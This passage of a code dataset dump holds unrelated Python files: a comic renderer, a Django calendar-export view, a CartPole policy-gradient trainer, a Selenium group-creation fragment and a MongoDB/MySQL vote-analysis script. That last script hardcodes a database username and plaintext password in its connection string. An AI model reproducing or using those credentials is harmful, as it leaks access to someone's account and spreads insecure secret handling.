"usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 53, "usage_type": "call"}, {"api_name": "pymbvi.util.autograd_jacobian", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 61, "usage_type": "call"}, {"api_name": "torchdiffeq.odeint_adjoint", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.optim.LBFGS", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 75, "usage_type": "attribute"}, {"api_name": "torchdiffeq.odeint_adjoint", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.is_grad_enabled", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 129, "usage_type": "call"}, {"api_name": "torchdiffeq.odeint_adjoint", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "208889231", "text": "import cairocffi as cairo\nimport collections\nimport math\nimport random\nimport z3\n\nfrom comic import handdraw\nfrom comic import geom\nfrom comic import text\n\n\nDialog = collections.namedtuple(\"Dialog\", \"speaker text\")\n\n\ndef make_stick_figure(s, name):\n stick_figure = geom.Rectangle(s, name)\n s.add(stick_figure.width == 140, stick_figure.height == 225)\n return stick_figure\n\n\ndef draw_stick_figure(ctx):\n # head\n head_radius = 25 + random.randint(-2, 2)\n handdraw.circle(ctx, 25 + random.randint(-5, 5), 27, head_radius)\n\n # eyes\n right_eye_y = 25 - 5 + random.randint(-2, 2)\n\n handdraw.dot(ctx, 25 + 10 + random.randint(-2, 2), right_eye_y)\n handdraw.dot(ctx,\n 25 - 10 + random.randint(-2, 2),\n right_eye_y + random.randint(-2, 2))\n\n # mouth\n ctx.move_to(25 - 10 + random.randint(-2, 2),\n 25 + 10 + random.randint(-2, 2))\n handdraw.line(ctx,\n 25 + 10 + random.randint(-2, 2),\n 25 + 10 + random.randint(-2, 2))\n ctx.close_path()\n\n # body\n leg_point = 125 + random.randint(-5, 25)\n ctx.move_to(25, 25 + head_radius)\n handdraw.line(ctx, 25, leg_point)\n ctx.close_path()\n\n # arms\n arm_point = 60 + random.randint(-5, 25)\n ctx.move_to(25, arm_point)\n handdraw.line(ctx,\n 0 + random.randint(-12, 12), 125 + random.randint(-12, 12))\n ctx.close_path()\n\n ctx.move_to(25, arm_point)\n handdraw.line(ctx,\n 50 + random.randint(-12, 12), 125 + random.randint(-12, 12))\n ctx.close_path()\n\n # legs\n ctx.move_to(25, leg_point)\n handdraw.line(ctx,\n 0 + random.randint(-12, 12),\n leg_point + 40 + random.randint(-12, 12))\n ctx.close_path()\n\n ctx.move_to(25, leg_point)\n handdraw.line(ctx,\n 50 + random.randint(-12, 12),\n leg_point + 40 + random.randint(-12, 12))\n ctx.close_path()\n\n\nclass Panel(object):\n def __init__(self, stick_figures, dialog_texts):\n self.stick_figures = stick_figures\n self.dialog_texts = dialog_texts\n\n def draw(self, ctx, width, height):\n def make_adjoining_line(s, top, bottom, name):\n adjoining_line = geom.Line(s, name)\n s.add(line_frame_constraints(adjoining_line))\n\n s.add(adjoining_line.y0 - top.bottom == 10,\n bottom.top - adjoining_line.y1 == 10,\n adjoining_line.x0 == top.center,\n adjoining_line.x1 == bottom.center)\n\n return adjoining_line\n\n def rect_frame_constraints(rect):\n return z3.And([rect.left >= 0, rect.right <= width,\n rect.top >= 0, rect.bottom <= height])\n\n def line_frame_constraints(line):\n return z3.And([line.x0 >= 0, line.x0 <= width,\n line.x1 >= 0, line.x1 <= width,\n line.y0 >= 0, line.y0 <= height,\n line.y1 >= 0, line.y1 <= height])\n\n s = z3.Optimize()\n\n stick_figures = {}\n stick_figure_list = []\n\n speaker_dialogs = {}\n label_rects = []\n\n ascent, descent, h, max_x_advance, max_y_advance = ctx.font_extents()\n\n for i, label in enumerate(self.stick_figures):\n stick_figure = make_stick_figure(s, \"stick_figure_\" + str(i))\n stick_figures[label] = stick_figure\n stick_figure_list.append(stick_figure)\n\n speaker_dialogs[label] = []\n\n x_bearing, y_bearing, w, _, x_advance, y_advance = ctx.text_extents(label)\n\n label_rect = geom.Rectangle(s, \"label_\" + str(i))\n s.add(rect_frame_constraints(label_rect),\n stick_figure.bottom >= int(0.8 * height),\n label_rect.width == w, label_rect.height == h,\n label_rect.left >= 50, label_rect.right <= (width - 50),\n label_rect.bottom <= (height - 20),\n label_rect.flex_center(stick_figure, 0, 5),\n label_rect.flex_below(stick_figure, 2, 5))\n label_rects.append(label_rect)\n\n dialogs = []\n\n adjoining_lines = []\n\n # add stick figure constraints\n for left, right in zip(stick_figure_list, stick_figure_list[1:]):\n s.add(right.flex_right_of(left, 5, 100),\n right.flex_top(left, 0, 10))\n\n s.add(geom.abs(stick_figure_list[0].left -\n (width - stick_figure_list[-1].right)) < 100)\n\n if self.dialog_texts:\n # create dialog rects\n for i, dialog_text in enumerate(self.dialog_texts):\n dialog = text.make_text(ctx, s, dialog_text.text)\n\n s.add(rect_frame_constraints(dialog.rect),\n dialog.rect.left >= 50, dialog.rect.right <= (width - 50),\n dialog.rect.top >= 50)\n\n my_dialogs = speaker_dialogs[dialog_text.speaker]\n\n dialogs.append(dialog)\n my_dialogs.append(dialog)\n\n # position dialogs close to each other\n for above, below in zip(dialogs, dialogs[1:]):\n s.add(above.rect.flex_above(below.rect, 25, 100))\n\n # add stick_figure dialog-specific constraints\n for i, stick_figure in enumerate(stick_figure_list):\n my_dialogs = speaker_dialogs[self.stick_figures[i]]\n\n if my_dialogs:\n # add adjoining line between the last dialog line and the stick figure\n adjoining_lines.append(make_adjoining_line(\n s, my_dialogs[-1].rect, stick_figure,\n \"adjoining_line_stick_figure_\" + str(i)))\n\n # add adjoining lines between each dialog\n for above, below in zip(my_dialogs, my_dialogs[1:]):\n adjoining_lines.append(make_adjoining_line(\n s, above.rect, below.rect, hex(id(above)) + \".\" + hex(id(below))))\n\n my_dialog = None\n for my_dialog in my_dialogs:\n # keep the dialog centered by the stick figure\n s.add(my_dialog.rect.flex_center(stick_figure, 0, 25))\n\n if my_dialog is not None:\n # make sure the stick_figure is below this dialog\n s.add(stick_figure.below(my_dialog.rect))\n\n # position last dialog line above its speaker\n last_speaker = stick_figure_list[\n self.stick_figures.index(self.dialog_texts[-1].speaker)]\n last_dialog = dialogs[-1]\n\n s.add(last_dialog.rect.flex_above(last_speaker, 25, 100))\n\n assert s.check() == z3.sat\n model = s.model()\n\n ctx.set_source_rgb(0.0, 0.0, 0.0)\n\n # draw adjoining lines\n for adjoining_line in adjoining_lines:\n m = adjoining_line.extract_model(model)\n ctx.move_to(m.x0, m.y0)\n handdraw.line(ctx, m.x1, m.y1)\n ctx.close_path()\n\n ctx.stroke()\n\n # draw dialog\n for dialog in dialogs:\n for word in dialog.words:\n r = word.rect.extract_model(model)\n\n ctx.save()\n ctx.set_source_rgb(1.0, 1.0, 1.0)\n ctx.rectangle(r.left - 5, r.top -5, r.width + 10, r.height + 10)\n ctx.fill()\n ctx.restore()\n\n for word in dialog.words:\n r = word.rect.extract_model(model)\n\n ctx.save()\n ctx.move_to(r.left, r.top + ascent)\n ctx.show_text(word.text)\n ctx.restore()\n\n # draw border\n handdraw.rectangle(ctx, 10, 10, width - 10, height - 10)\n\n # draw stick figures\n for stick_figure in stick_figure_list:\n m = stick_figure.extract_model(model)\n ctx.save()\n ctx.translate(m.left + 50, m.top)\n draw_stick_figure(ctx)\n ctx.restore()\n\n ctx.stroke()\n\n # draw labels\n for label, label_rect in zip(self.stick_figures, label_rects):\n m = label_rect.extract_model(model)\n ctx.move_to(m.left, m.top + ascent)\n ctx.show_text(label)\n\n\nclass Comic(object):\n TITLE_SIZE = 30\n TEXT_SIZE = 15\n\n def __init__(self, title, panels, panel_width, panel_height, panels_per_row):\n self.title = title\n self.panels = panels\n self.panel_width = panel_width\n self.panel_height = panel_height\n self.panels_per_row = panels_per_row\n\n @property\n def width(self):\n return self.panel_width * self.panels_per_row + 20\n\n @property\n def height(self):\n return self.panel_height * \\\n math.ceil(len(self.panels) / self.panels_per_row) \\\n + self.TITLE_SIZE + 20\n\n def draw(self, ctx):\n ctx.save()\n ctx.select_font_face(\"Buttweasel\")\n ctx.set_font_size(self.TITLE_SIZE)\n ctx.rectangle(0, 0, self.width, self.height)\n ctx.set_source_rgb(1.0, 1.0, 1.0)\n ctx.fill()\n ctx.set_source_rgb(0.0, 0.0, 0.0)\n ctx.set_line_width(3)\n ctx.set_line_cap(cairo.LINE_CAP_ROUND)\n\n ctx.save()\n ascent, descent, h, max_x_advance, max_y_advance = ctx.font_extents()\n x_bearing, y_bearing, w, _, x_advance, y_advance = ctx.text_extents(\n self.title)\n ctx.move_to((self.panel_width * self.panels_per_row - w) / 2 + random.randint(-2, 2),\n ascent + self.TITLE_SIZE - h / 2 + random.randint(-2, 2))\n ctx.show_text(self.title)\n ctx.restore()\n\n ctx.set_font_size(self.TEXT_SIZE)\n\n for i, panel in enumerate(self.panels):\n x = i % self.panels_per_row\n y = i // self.panels_per_row\n\n ctx.save()\n ctx.translate(x * self.panel_width + 10,\n y * self.panel_height + self.TITLE_SIZE + 10)\n panel.draw(ctx, self.panel_width, self.panel_height)\n ctx.restore()\n\n ctx.restore()", "sub_path": "comic/comic.py", "file_name": "comic.py", "file_ext": "py", "file_size_in_byte": 9046, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.namedtuple", "line_number": 12, "usage_type": "call"}, {"api_name": "comic.geom.Rectangle", "line_number": 16, "usage_type": "call"}, {"api_name": "comic.geom", "line_number": 16, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "comic.handdraw.circle", "line_number": 24, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 24, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "comic.handdraw.dot", "line_number": 29, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 29, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 29, "usage_type": "call"}, {"api_name": "comic.handdraw.dot", "line_number": 30, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 30, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 37, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 37, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 38, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 45, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 45, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 49, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 51, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 51, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 52, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 56, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 56, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 57, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 62, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 62, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 63, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 64, "usage_type": "call"}, {"api_name": "comic.handdraw.line", "line_number": 68, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 68, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 69, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 70, "usage_type": "call"}, {"api_name": "comic.geom.Line", "line_number": 81, "usage_type": "call"}, {"api_name": "comic.geom", "line_number": 81, "usage_type": "name"}, {"api_name": "z3.And", "line_number": 92, "usage_type": "call"}, {"api_name": "z3.And", "line_number": 96, "usage_type": "call"}, {"api_name": "z3.Optimize", "line_number": 101, "usage_type": "call"}, {"api_name": "comic.geom.Rectangle", "line_number": 120, "usage_type": "call"}, {"api_name": "comic.geom", "line_number": 120, "usage_type": "name"}, {"api_name": "comic.geom.abs", "line_number": 139, "usage_type": "call"}, {"api_name": "comic.geom", "line_number": 139, "usage_type": "name"}, {"api_name": "comic.text.make_text", "line_number": 145, "usage_type": "call"}, {"api_name": "comic.text", "line_number": 145, "usage_type": "name"}, {"api_name": "z3.sat", "line_number": 191, "usage_type": "attribute"}, {"api_name": "comic.handdraw.line", "line_number": 200, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 200, "usage_type": "name"}, {"api_name": "comic.handdraw.rectangle", "line_number": 225, "usage_type": "call"}, {"api_name": "comic.handdraw", "line_number": 225, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 262, "usage_type": "call"}, {"api_name": "cairocffi.LINE_CAP_ROUND", "line_number": 274, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 280, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 281, "usage_type": "call"}]} +{"seq_id": "419122835", "text": "from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render\nfrom .forms import UploadText, convert2calendar, get_time, create_csv_download\n\nimport csv\n\ndef index(request):\n if request.method == 'POST':\n form = UploadText(request.POST)\n if form.is_valid():\n data = convert2calendar(form.cleaned_data['regHtml'])\n open_day = form.cleaned_data['open_date_semester']\n end_day = form.cleaned_data['end_date_semester']\n\n content = create_csv_download(open_day, end_day, data)\n\n response = HttpResponse(content_type='text/ics')\n response['Content-Disposition'] = 'attachment; filename=\"export.ics\"'\n response.write(content)\n return response\n\n else:\n form = UploadText()\n return render(request, 'genclass/index.html', {'form': form})", "sub_path": "gcalendar_gen_class/genclass/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 878, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "forms.UploadText", "line_number": 9, "usage_type": "call"}, {"api_name": "forms.convert2calendar", "line_number": 11, "usage_type": "call"}, {"api_name": "forms.create_csv_download", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "forms.UploadText", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "150083162", "text": "import operator\nimport MySQLdb\nimport pymongo\nfrom pymongo import MongoClient\n#connect to databases\nclient = MongoClient(host='mongodb://austincapobianco:fucksluts10@ds037244.mongolab.com:37244/personanexus', port=37244)\ndb = client['personanexus']\ncollection = db['rawVoteData']\n\n\ndb=MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"\", db=\"test\", port=3306)\nmysqlcursor = db.cursor()\n\n\n\n#mysqlcursor.execute(\"\"\"SELECT * FROM plsql;\"\"\")\n#fetch all personas\n#print(mysqlcursor.fetchall())\n\n#mysqlcursor.execute(\"\"\"SELECT * FROM pglsql;\"\"\")\n#fetch all persona groups\n#print(mysqlcursor.fetchall())\n\n#two inputs\n#personaID and groupID (fire from group 1 and the directions group)\ninitialQueryPID = 9\nqueryGID = 5\n\n#get all personaIDs associated with queryGID\nPIDsInGID = []\nmysqlcursor.execute(\"\"\"SELECT personaID FROM plsql WHERE groupID = %s;\"\"\", (queryGID,))\nfor item in mysqlcursor.fetchall():\n #print(item)\n PIDsInGID += item\n\nPIDdict ={}\n#for each one find the yesvotes/totalvotes\nfor PID in PIDsInGID:\n cursor = collection.find({\"$and\": [{\"personacombo\":initialQueryPID},{\"personacombo\":PID}] }, projection={'yesvotes':1,'totalvotes':1})\n for document in cursor:\n ratio = document['yesvotes']/document['totalvotes']\n PIDdict[PID] = ratio\n #print(str(PID) + ':' + str(ratio))\n #print(document['yesvotes'])\nprint(PIDdict)\nif any(PIDdict) == False: #check if dict is empty first\n print(\"sorry bro not enough data\")\n#dict.item instead of dict.iteritems cause python 3\nelse: print(max(PIDdict.items(), key=operator.itemgetter(1))[0])\n \n", "sub_path": "process_personanexus_data_old.py", "file_name": "process_personanexus_data_old.py", "file_ext": "py", "file_size_in_byte": 1587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymongo.MongoClient", "line_number": 6, "usage_type": "call"}, {"api_name": "MySQLdb.connect", "line_number": 11, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "633267675", "text": "# A simple policy gradient approach for CartPole based on OpenAI\n# spinning up:\n# https://spinningup.openai.com/en/latest/spinningup/rl_intro3.html#other-forms-of-the-policy-gradient\n#\n# The trained model is able to get solve CartPole under a specified\n# default_max_steps.\n\nimport gym\nimport numpy as np\nimport tensorflow as tf\n\nfrom absl import logging\nfrom drl_playground.test_env.bandit import BanditEnv\nfrom tqdm import tqdm\n\nlogging.set_verbosity(logging.INFO)\n\n# Set up the gym environment and global variables related to the environment.\nenv = gym.make('CartPole-v0')\n\n# Swap to a simple bandit testing environment.\n# env = BanditEnv()\nobservation_dim = env.observation_space.shape[0] # 4\nactions_dim = env.action_space.n # 2\ndefault_max_steps = 100\n\n\ndef build_policy_net():\n \"\"\"\n Build the model for the policy network. The input to the model is a batch of\n observations (None, 4,) and the output is a batch of actions (None, 2,).\n\n Returns:\n model(tf.keras.Model): the sequential policy network.\n\n \"\"\"\n model = tf.keras.models.Sequential([\n tf.keras.layers.Dense(6, batch_input_shape=(None, observation_dim)),\n tf.keras.layers.Activation('relu'),\n # Hidden layers. TODO: make the hidden layers neuron counts tunable.\n tf.keras.layers.Dense(actions_dim),\n ])\n return model\n\n\ndef compute_average_return(model, n_episodes, max_steps=default_max_steps,\n render=False):\n \"\"\"Computes the average cumulative rewards for a model among n episodes.\n\n Args:\n model(tf.keras.Model): the model to be evaluated.\n n_episodes(int): the number of episodes to run, defaults to 20.\n max_steps(int): the max number of steps before terminating an episode.\n render(bool): whether we render the CartPole environments while\n running these simulations.\n\n Returns:\n avg_return(float): the average cumulative reward for the n episodes.\n\n \"\"\"\n sum_episodes_returns = 0\n for episode in range(n_episodes):\n episode_return = 0\n observation = env.reset()\n for t in range(max_steps):\n if render:\n env.render()\n\n action_logits = model.predict(np.expand_dims(observation, axis=0))[\n 0]\n # Select the action greedily at inference time.\n action = np.argmax(action_logits)\n logging.debug(\"selected action: {}\".format(action))\n observation, reward, done, _ = env.step(action)\n episode_return += reward\n if done:\n logging.info(\"Episode finished after {} time steps\".format(t +\n 1))\n break\n\n sum_episodes_returns += episode_return\n logging.info(\"The return for episode {} is {}\".format(episode,\n episode_return))\n\n avg_return = sum_episodes_returns * 1.0 / n_episodes\n\n return avg_return\n\n\n@tf.function\ndef get_loss(reward_weights, action_logits, actions, in_progress):\n \"\"\"Get the loss tensor (None, ) where None represents the batch size.\n\n This follows the simple policy gradient loss function from OpenAI\n spinning up:\n https://spinningup.openai.com/en/latest/spinningup/rl_intro3.html#other-forms-of-the-policy-gradient\n\n Args:\n reward_weights(Tensor): shape (None, 1), dtype float32, cumulative\n rewards per episode used as weights for the policy gradient. None\n represents the number of episodes.\n action_logits(Tensor): shape (None, None, 2), dtype float32, - (episode\n number, time step, the policy model's output logit).\n actions(Tensor): shape(None, None, ) dtype int64 - (batch size,\n time step, ), the true action that was taken at this step.\n in_progress(Tensor): shape (None, None, ), dtype float32, a 0/1 value\n indicating whether the episode was in progress at an action.\n Returns:\n A loss tensor with shape (None, ), dtype float 32 - (batch_size, ). The\n gradient of the defined loss is equivalent to the policy gradient.\n\n \"\"\"\n # actions_one_hot shape: (batch_size, action_steps, action_dim)\n actions_one_hot = tf.one_hot(actions, depth=actions_dim,\n dtype=tf.float32, axis=-1)\n # masked_log_softmax shape: (batch_size, action_steps, 2)\n masked_log_softmax = tf.nn.log_softmax(action_logits) * tf.expand_dims(\n in_progress, -1)\n # log_probs shape: (batch_size, action_steps)\n log_probs = tf.reduce_sum(\n masked_log_softmax * tf.cast(\n actions_one_hot, dtype=tf.float32), axis=-1)\n # loss shape: (batch_size, )\n loss = -tf.reduce_mean(reward_weights * log_probs, axis=-1)\n return loss\n\n\ndef train(model, batch_size, max_steps=default_max_steps):\n \"\"\"Perform one gradient update to the model for a batch of episodes.\n\n This follows the simple policy gradient loss function from OpenAI\n spinning up:\n https://spinningup.openai.com/en/latest/spinningup/rl_intro3.html#other-forms-of-the-policy-gradient\n\n Args:\n model(tf.keras.Model): the model to be trained, generated from\n build_policy_net.\n batch_size: the number of episodes in a batch.\n max_steps: the max number of steps the agent can take before we\n declare the game as \"done\".\n\n \"\"\"\n # TODO: Run each episode in parallel to speed up training.\n # a list of action logits tensors for all actions in all episodes. Shape: (\n # batch_size, max_steps, action_logits_tensor).\n all_action_logits = []\n all_actions = []\n # a list of 1/0s representing whether the episode is still in progress or\n # has already finished, for all actions and all episodes.\n all_in_progress = []\n # a list of cumulative rewards tensors for all episodes. Shape (\n # batch_size, reward_tensor).\n all_rewards = []\n\n with tf.GradientTape() as tape:\n tape.watch(model.trainable_weights)\n for _ in range(batch_size):\n obs = env.reset()\n\n eps_rewards = 0\n eps_observations = []\n\n time = 0\n eps_action_logits = []\n eps_actions = []\n eps_in_progress = []\n done = False\n while time < max_steps:\n eps_in_progress.append(\n tf.constant(int(not done), dtype=tf.float32))\n if done:\n eps_action_logits.append(tf.constant(\n 0, dtype=tf.float32, shape=(actions_dim,)))\n eps_actions.append(tf.constant(0, dtype=tf.int64))\n eps_observations.append(tf.constant(0,\n dtype=tf.float32,\n shape=(\n observation_dim,)))\n else:\n eps_observations.append(obs)\n # action_logit shape: (1, 2).\n action_logit = model(np.expand_dims(obs, axis=0))\n eps_action_logits.append(action_logit[0])\n\n # TODO: add temperature for exploration tuning.\n action = tf.random.categorical(action_logit,\n num_samples=1)[0][0]\n eps_actions.append(action)\n obs, reward, done, _ = env.step(action.numpy())\n eps_rewards += reward\n\n time += 1\n\n all_action_logits.append(eps_action_logits)\n all_actions.append(eps_actions)\n all_rewards.append([eps_rewards])\n all_in_progress.append(eps_in_progress)\n\n packed_all_action_logits = tf.stack(all_action_logits)\n packed_all_action_logits = tf.stack(packed_all_action_logits)\n packed_all_actions = tf.stack(all_actions)\n packed_all_actions = tf.stack(packed_all_actions)\n\n loss = get_loss(tf.stack(all_rewards),\n tf.stack(packed_all_action_logits),\n tf.stack(packed_all_actions),\n tf.stack(all_in_progress))\n\n gradient = tape.gradient(loss, model.trainable_weights)\n opt = tf.keras.optimizers.Adam(learning_rate=0.01)\n logging.debug(\"loss: {} \\n, gradient: {} \\n, trainable weights: {} \"\n \"\\n\".format(\n loss, gradient, model.trainable_weights))\n opt.apply_gradients(zip(gradient, model.trainable_weights))\n\n\n# Initialize the agent with random weights and evaluate its performance.\npolicy_net = build_policy_net()\nrandom_model_reward = compute_average_return(policy_net, n_episodes=10)\nlogging.info(\"The average reward among all episodes for a randomly initialized \"\n \"model is {}\".format(random_model_reward))\n\nnum_batch = 100\nfor i in tqdm(range(num_batch)):\n train(policy_net, batch_size=128)\ntrained_model_reward = compute_average_return(policy_net, n_episodes=10)\nlogging.info(\n \"The average reward among all episodes for a trained model is {}.\".format(\n trained_model_reward))\nenv.close()\n", "sub_path": "drl_playground/policy_gradient/vanilla_cartpole_main.py", "file_name": "vanilla_cartpole_main.py", "file_ext": "py", "file_size_in_byte": 9245, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "absl.logging.set_verbosity", "line_number": 16, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 16, "usage_type": "name"}, {"api_name": "absl.logging.INFO", "line_number": 16, "usage_type": "attribute"}, {"api_name": "gym.make", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Activation", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 72, "usage_type": "call"}, {"api_name": "absl.logging.debug", "line_number": 73, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 73, "usage_type": "name"}, {"api_name": "absl.logging.info", "line_number": 77, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 77, "usage_type": "name"}, {"api_name": "absl.logging.info", "line_number": 82, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 82, "usage_type": "name"}, {"api_name": "tensorflow.one_hot", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.log_softmax", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 117, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 120, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 121, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 122, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 124, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.GradientTape", "line_number": 155, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 170, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 170, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 172, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 173, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 175, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 176, "usage_type": "attribute"}, {"api_name": "numpy.expand_dims", "line_number": 182, "usage_type": "call"}, {"api_name": "tensorflow.random.categorical", "line_number": 186, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 186, "usage_type": "attribute"}, {"api_name": "tensorflow.stack", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 200, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 201, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 204, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 205, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 207, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 210, "usage_type": "attribute"}, {"api_name": "absl.logging.debug", "line_number": 211, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 211, "usage_type": "name"}, {"api_name": "absl.logging.info", "line_number": 220, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 220, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 224, "usage_type": "call"}, {"api_name": "absl.logging.info", "line_number": 227, "usage_type": "call"}, {"api_name": "absl.logging", "line_number": 227, "usage_type": "name"}]} +{"seq_id": "294779974", "text": "from selenium import webdriver\nfrom time import sleep\nimport sys\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom session import open_session\n\n\ndef create_group(groupname, contacts, browser=None):\n shouldreturnbrowser = False\n if browser == None:\n shouldreturnbrowser = True\n # data-testid=\"menu\"\n browser = open_session()\n sleep(2)\n browser.find_element_by_css_selector('[data-testid=menu]').click()\n sleep(2)\n 